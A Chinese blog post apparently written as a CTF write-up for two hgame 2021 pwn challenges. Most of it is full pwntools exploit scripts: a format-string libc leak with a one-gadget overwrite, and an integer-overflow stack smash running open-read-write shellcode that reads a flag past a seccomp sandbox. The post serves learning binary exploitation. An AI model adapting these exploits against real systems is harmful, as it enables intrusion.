hgame week1 2021 pwn

阅读数: 次 2021-04-23

字数统计: 682字 | 阅读时长: 3分

once
letter

once

写这个题的时候发现了一个工具，可以修改题目加载的libc.so和ld.so文件
patchelf
注释掉的是本地环境下的情况

#!/usr/bin/env python2

#env1=ubuntu 16.04  native
#env2=ld-2.27.so  libc.2.27
from pwn import *

arch = "amd64"
filename = "once"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)

# libc
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc=ELF("./libc-2.27.so")
main_libc=libc.symbols['__libc_start_main']
#ogg_libc=[0x45226,0x4527a,0xf0364,0xf1207]
ogg_libc=[0x4f3d5,0x4f432,0x10a41c]

def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")


def main():
    global io

    if content == 0:
        io = process("./once")
    else:
        io = remote("")
    #leak
    io.recvuntil("It is your turn: ")
    payload = b'%13$p\n'  #6+7
    payload =payload.ljust(0x28,b'k')
    payload += b'\xd3'
    print(payload)
    #gdb.attach(io, 'b printf')
    io.send(payload)
    #count
    #main_addr=int(io.recv(14),16)-240
    main_addr=int(io.recv(14),16)-231
    print(hex(main_addr))
    libcbase=main_addr-main_libc
    ogg_addr=libcbase+ogg_libc[0]
    #flow
    payload=b'\x00'*(0x28)+p64(ogg_addr)
    io.recvuntil("It is your turn: ")
    io.send(payload)
    io.interactive()
main()

letter

seccomp禁用了一些系统调用（沙箱保护）所以即使整形溢出也无法通过system，onegadget来getshell

学到了一个工具seccomp-tools

所以这里需要用orw（open-read-write），题解是直接编写的shellcode。。。萌新太难了
我编不来，又看了其他师傅的wp，发现shellcraft可以更快的编出shellcode。
接下来三种思路
1.由于输入的lenth位置已知，把lenth最低的一个字节写为“jmp rsp”,就可以通过栈迁移，getshell了。
2.看了一些师傅是重新跳转到溢出的read函数将shellcode读到位置a，再跳转回a，具体的细节很神奇，我看不懂，枯了。还用ret2csu修改了rbp，伪造了栈帧？
3.其他的还可以利用gadget（pop rdi之类的），构造rop链，和2思路差不多，都是read shellcode到bss段，再跳转过去执行

#!/usr/bin/env python2
from pwn import *

arch = "amd64"
filename = "letter"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)
jmp_addr=0x000000000060108C
# libc

def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")
    #int_flow
    #io.sendlineafter('?\n',"-268376833")  #0xFFFFFFFF F000 E4FF
    #io.sendlineafter('?\n', "-16718593")  #0xFFFFFFFF FF00 E4FF
    #io.sendlineafter('?\n',"-989953")     #0xFFFFFFFF FFF0 E4FF
    io.sendlineafter('?\n',"-6913")        #0xFFFFFFFF FFFF E4FF
    #getshell
    shellcode = '''
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c66
    xor [rsp], rax
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 2
    syscall
    xor rax, rax
    mov rdi, 3
    mov rsi, 0x601070
    mov rdx, 0x100
    syscall
    mov rax, 1
    mov rdi, 1
    mov rsi, 0x601070
    mov rdx,0x100
    syscall'''

    orw_pay=shellcraft.open("./flag")
    orw_pay+=shellcraft.read(3,0x601070,0x50)
    orw_pay+=shellcraft.write(1,0x601070,0x50)
    payload = b'a' * (0x18) + p64(jmp_addr)
    payload +=asm(orw_pay)
    io.sendline(payload)
    io.recv()
    io.interactive()
main()

-------------本文结束感谢您的阅读-------------